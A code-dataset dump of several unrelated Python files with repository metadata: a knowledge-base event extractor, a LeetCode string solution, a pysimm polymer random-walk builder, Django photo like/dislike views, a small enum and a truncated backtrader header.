f72eb438d3abf9cfce6d1a6d2c601b7b771936ca | 3,568 | py | Python | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
### Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file. ###
def main(argv):
opts, _ = getopt.getopt(argv,"hi:e:s:o:",["ifile=","efile=","sfile=","ofile="])
for opt, arg in opts:
if opt == '-h':
print('Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
# entity_type_to_dict_key = {'PER': 'PER_entities'} --> I didn't use this.
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| 36.040404 | 242 | 0.633688 | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| true | true |
f72eb4628f805442a54c0a5abe345ae985fd1cad | 833 | py | Python | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.36
工具: python == 3.7.3
"""
"""
思路:
代码简单,但是关键是理解题意:
注意题目中的独有两个字:
s1 = 'ab',s2 = 'a',因为ab是s1独有,所以最长子序列为ab;
s1 = 'ab', s2 = 'ab', 因为ab是两个串都有,ab排除,a也是两个串都有,排除,b也是两个串都有,排除。所以最长特殊序列不存在,返回-1;
通过以上分析,我们可以得出结论,如果:两个串相等(不仅长度相等,内容也相等),那么他们的最长特殊序列不存在。返回-1;
如果两个串长度不一样,那么长的串 永远也不可能是 短串的子序列,即len(s1) > len(s2),则最长特殊序列为s1,返回长度大的数。
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了75%的用户
内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了6.40%的用户
"""
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| 22.513514 | 87 | 0.593037 |
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| true | true |
f72eb54af7802f9a7de3342afa34f50fbf810d29 | 13,415 | py | Python | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | # ******************************************************************************
# pysimm.apps.random_walk module
# ******************************************************************************
#
# psuedo random walk algorithm written using pysimm tools
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
"""pysimm.apps.random_walk.find_last_backbone_vector
Finds vector between backbone atoms in terminal monomer. Requires current system s, and reference monomer m.
Args:
s: :class:`~pysimm.system.System` object
m: :class:`~pysimm.system.System` object
Returns:
list of vector components
"""
head_pos = [0, 0, 0]
tail_pos = [0, 0, 0]
for p in s.particles[-1*m.particles.count:]:
if p.linker == 'head':
head_pos = [p.x, p.y, p.z]
elif p.linker == 'tail':
tail_pos = [p.x, p.y, p.z]
return [head_pos[0] - tail_pos[0], head_pos[1] - tail_pos[1], head_pos[2] - tail_pos[2]]
def copolymer(m, nmon, s_=None, **kwargs):
"""pysimm.apps.random_walk.copolymer
Builds copolymer using random walk methodology using pattern
Args:
m: list of reference monomer :class:`~pysimm.system.System`s
nmon: total number of monomers to add to chain
s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
settings: dictionary of simulation settings
density: density at which to build polymer (0.3)
forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
capped: True/False if monomers are capped
unwrap: True to unwrap final system
traj: True to build xyz trajectory of polymer growth (True)
pattern: list of pattern for monomer repeat units, should match length of m ([1 for _ in range(len(m))])
limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
Returns:
new copolymer :class:`~pysimm.system.System`
"""
m = [x.copy() for x in m]
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
for m_ in m:
m_.add_particle_bonding()
for p in m_.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m_.remove_linker_types()
if s_ is None:
s = system.replicate(m[0], 1, density=density/nmon)
else:
s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
for p in s.particles:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
for m_ in m:
if capped:
m_.particles.remove(1)
m_.remove_spare_bonding()
m_.add_particle_bonding()
s.add_particle_bonding()
if traj:
s.write_xyz('random_walk.xyz')
temp_nmon = 1
while True:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
if temp_nmon == 1 and p_ == 1:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
elif temp_nmon == 1:
p_ -= 1
for insert in range(p_):
head = None
tail = None
backbone_vector = np.array([last_head.x - last_tail.x,
last_head.y - last_tail.y,
last_head.z - last_tail.z])
ref_head = None
ref_tail = None
for p in m_.particles:
if p.linker == 'head':
ref_head = p
elif p.linker == 'tail':
ref_tail = p
if ref_head and ref_tail:
ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
ref_head.y - ref_tail.y,
ref_head.z - ref_tail.z])
rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
translation_vector = [last_tail.x - ref_tail.x,
last_tail.y - ref_tail.y,
last_tail.z - ref_tail.z]
for p in m_.particles:
p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
else:
print('reference molecule has no head or tail')
n = m_.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
s.add(n, change_dim=False)
s.add_particle_bonding()
head = last_head
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
s.make_new_bonds(head, tail, f)
temp_nmon += 1
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
if unwrap:
s.unwrap()
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (temp_nmon)
sim.run(np=settings.get('np'))
if unwrap:
s.unwrap()
if unwrap:
s.wrap()
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
if temp_nmon >= nmon:
break
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
def random_walk(m, nmon, s_=None, **kwargs):
"""pysimm.apps.random_walk.random_walk
Builds homopolymer using random walk methodology
Args:
m: reference monomer :class:`~pysimm.system.System`
nmon: total number of monomers to add to chain
s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
extra_bonds: EXPERMINTAL, True if making ladder backbone polymer
settings: dictionary of simulation settings
density: density at which to build polymer (0.3)
forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
capped: True/False if monomers are capped
unwrap: True to unwrap final system
traj: True to build xyz trajectory of polymer growth (True)
limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
Returns:
new polymer :class:`~pysimm.system.System`
"""
m = m.copy()
extra_bonds = kwargs.get('extra_bonds', False)
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
m.add_particle_bonding()
for p in m.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m.remove_linker_types()
if s_ is None:
s = system.replicate(m, 1, density=density/nmon)
else:
s = system.replicate(m, 1, s_=s_, density=None)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
if traj:
s.write_xyz('random_walk.xyz')
if capped:
m.particles.remove(1)
m.remove_spare_bonding()
m.add_particle_bonding()
for insertion in range(nmon - 1):
head = None
tail = None
backbone_vector = np.array(find_last_backbone_vector(s, m))
for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
p_.x = p.x + 3*backbone_vector[0]
p_.y = p.y + 3*backbone_vector[1]
p_.z = p.z + 3*backbone_vector[2]
n = m.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
if extra_bonds:
heads = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
heads.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
head = p
s.add(n, change_dim=False)
s.add_particle_bonding()
if extra_bonds:
tails = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tails.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
for p in s.particles:
if not p.bonded_to:
print(p.tag)
if head and tail:
s.make_new_bonds(head, tail, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
elif extra_bonds and len(heads) == len(tails):
for h, t in izip(heads, tails):
s.make_new_bonds(h, t, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
else:
print('cannot find head and tail')
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (insertion+2)
sim.run(np=settings.get('np'))
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
| 34.309463 | 112 | 0.547372 |
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
head_pos = [0, 0, 0]
tail_pos = [0, 0, 0]
for p in s.particles[-1*m.particles.count:]:
if p.linker == 'head':
head_pos = [p.x, p.y, p.z]
elif p.linker == 'tail':
tail_pos = [p.x, p.y, p.z]
return [head_pos[0] - tail_pos[0], head_pos[1] - tail_pos[1], head_pos[2] - tail_pos[2]]
def copolymer(m, nmon, s_=None, **kwargs):
m = [x.copy() for x in m]
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
for m_ in m:
m_.add_particle_bonding()
for p in m_.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m_.remove_linker_types()
if s_ is None:
s = system.replicate(m[0], 1, density=density/nmon)
else:
s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
for p in s.particles:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
for m_ in m:
if capped:
m_.particles.remove(1)
m_.remove_spare_bonding()
m_.add_particle_bonding()
s.add_particle_bonding()
if traj:
s.write_xyz('random_walk.xyz')
temp_nmon = 1
while True:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
if temp_nmon == 1 and p_ == 1:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
elif temp_nmon == 1:
p_ -= 1
for insert in range(p_):
head = None
tail = None
backbone_vector = np.array([last_head.x - last_tail.x,
last_head.y - last_tail.y,
last_head.z - last_tail.z])
ref_head = None
ref_tail = None
for p in m_.particles:
if p.linker == 'head':
ref_head = p
elif p.linker == 'tail':
ref_tail = p
if ref_head and ref_tail:
ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
ref_head.y - ref_tail.y,
ref_head.z - ref_tail.z])
rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
translation_vector = [last_tail.x - ref_tail.x,
last_tail.y - ref_tail.y,
last_tail.z - ref_tail.z]
for p in m_.particles:
p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
else:
print('reference molecule has no head or tail')
n = m_.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
s.add(n, change_dim=False)
s.add_particle_bonding()
head = last_head
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
s.make_new_bonds(head, tail, f)
temp_nmon += 1
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
if unwrap:
s.unwrap()
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (temp_nmon)
sim.run(np=settings.get('np'))
if unwrap:
s.unwrap()
if unwrap:
s.wrap()
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
if temp_nmon >= nmon:
break
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
def random_walk(m, nmon, s_=None, **kwargs):
m = m.copy()
extra_bonds = kwargs.get('extra_bonds', False)
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
m.add_particle_bonding()
for p in m.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m.remove_linker_types()
if s_ is None:
s = system.replicate(m, 1, density=density/nmon)
else:
s = system.replicate(m, 1, s_=s_, density=None)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
if traj:
s.write_xyz('random_walk.xyz')
if capped:
m.particles.remove(1)
m.remove_spare_bonding()
m.add_particle_bonding()
for insertion in range(nmon - 1):
head = None
tail = None
backbone_vector = np.array(find_last_backbone_vector(s, m))
for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
p_.x = p.x + 3*backbone_vector[0]
p_.y = p.y + 3*backbone_vector[1]
p_.z = p.z + 3*backbone_vector[2]
n = m.copy()
if capped:
s.particles.remove(s.particles.count)
s.remove_spare_bonding()
s.add_particle_bonding()
if extra_bonds:
heads = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
heads.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'head':
head = p
s.add(n, change_dim=False)
s.add_particle_bonding()
if extra_bonds:
tails = []
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tails.append(p)
else:
for p in s.particles[-1*n.particles.count:]:
if p.linker == 'tail':
tail = p
for p in s.particles:
if not p.bonded_to:
print(p.tag)
if head and tail:
s.make_new_bonds(head, tail, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
elif extra_bonds and len(heads) == len(tails):
for h, t in izip(heads, tails):
s.make_new_bonds(h, t, f)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
else:
print('cannot find head and tail')
if sim is None:
sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
sim.add_md(ensemble='nve', limit=limit, **settings)
sim.add_min(**settings)
if isinstance(sim, lmps.Simulation):
sim.system = s
sim.name = 'relax_%03d' % (insertion+2)
sim.run(np=settings.get('np'))
if unwrap:
if not s.unwrap():
error_print('something went wrong')
return s
if traj:
s.write_xyz('random_walk.xyz', append=True)
if unwrap:
s.wrap()
for p in s.particles:
if p not in s.molecules[p.molecule.tag].particles:
s.molecules[p.molecule.tag].particles.add(p)
s.write_lammps('polymer.lmps')
s.unwrap()
s.write_xyz('polymer.xyz')
return s
| true | true |
f72eb557881c37baab88b43f249c035716e84b5c | 963 | py | Python | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | photos/views.py | zigapk/zerodays-challenge | 3031e11ef868631de2466e2003127ac83b033d58 | [
"MIT"
] | null | null | null | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
if request.method == 'GET':
photos = Photo.objects.all().order_by('unsplash_id')
return JsonResponse(list(map(lambda p: p.to_dict(), photos)), safe=False)
return HttpResponseNotAllowed
@csrf_exempt
def like_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_like()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
@csrf_exempt
def dislike_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_dislike()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
| 26.75 | 81 | 0.687435 | from django.db import transaction
from django.http import JsonResponse, HttpResponseNotAllowed
from django.views.decorators.csrf import csrf_exempt
from .models import Photo
def list_photos(request):
if request.method == 'GET':
photos = Photo.objects.all().order_by('unsplash_id')
return JsonResponse(list(map(lambda p: p.to_dict(), photos)), safe=False)
return HttpResponseNotAllowed
@csrf_exempt
def like_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_like()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
@csrf_exempt
def dislike_photo(request, pk: int):
if request.method == 'PATCH':
with transaction.atomic():
photo = Photo.objects.get(pk=pk)
photo.add_dislike()
return JsonResponse(photo.to_dict())
return HttpResponseNotAllowed
| true | true |
f72eb561be479318fbf20e59f9be7488fc76b552 | 221 | py | Python | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | 20 | 2021-12-31T15:28:20.000Z | 2022-02-15T18:24:16.000Z | src/enums/_constraints.py | Freonius/tranquillity | bb190b4a8facf643d5018a710100b3ff45d6d640 | [
"MIT"
] | null | null | null | from enum import Enum, auto
class Constraints(Enum):
not_empty = auto()
greater_than_0 = auto()
not_null = auto()
is_email = auto()
is_uri = auto()
after_now = auto()
before_now = auto()
| 18.416667 | 27 | 0.606335 | from enum import Enum, auto
class Constraints(Enum):
not_empty = auto()
greater_than_0 = auto()
not_null = auto()
is_email = auto()
is_uri = auto()
after_now = auto()
before_now = auto()
| true | true |
f72eb585890bafe8941f0c78a9d950477be13230 | 2,555 | py | Python | backtrader/backtrader/indicators/__init__.py | harshabakku/live-back-testing-trader | 1fd69c7598dc15bea740f160eed886f396bcba2c | [
"MIT"
] | 1 | 2021-07-14T22:04:08.000Z | 2021-07-14T22:04:08.000Z | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | null | null | null | backtrader/backtrader/indicators/__init__.py | ajmal017/LiveBackTestingTrader | 8b4f5804c0aa6046128f6706582f9cde78a0519a | [
"MIT"
] | 3 | 2021-03-07T16:29:40.000Z | 2022-03-17T21:42:38.000Z | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015, 2016, 2017 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
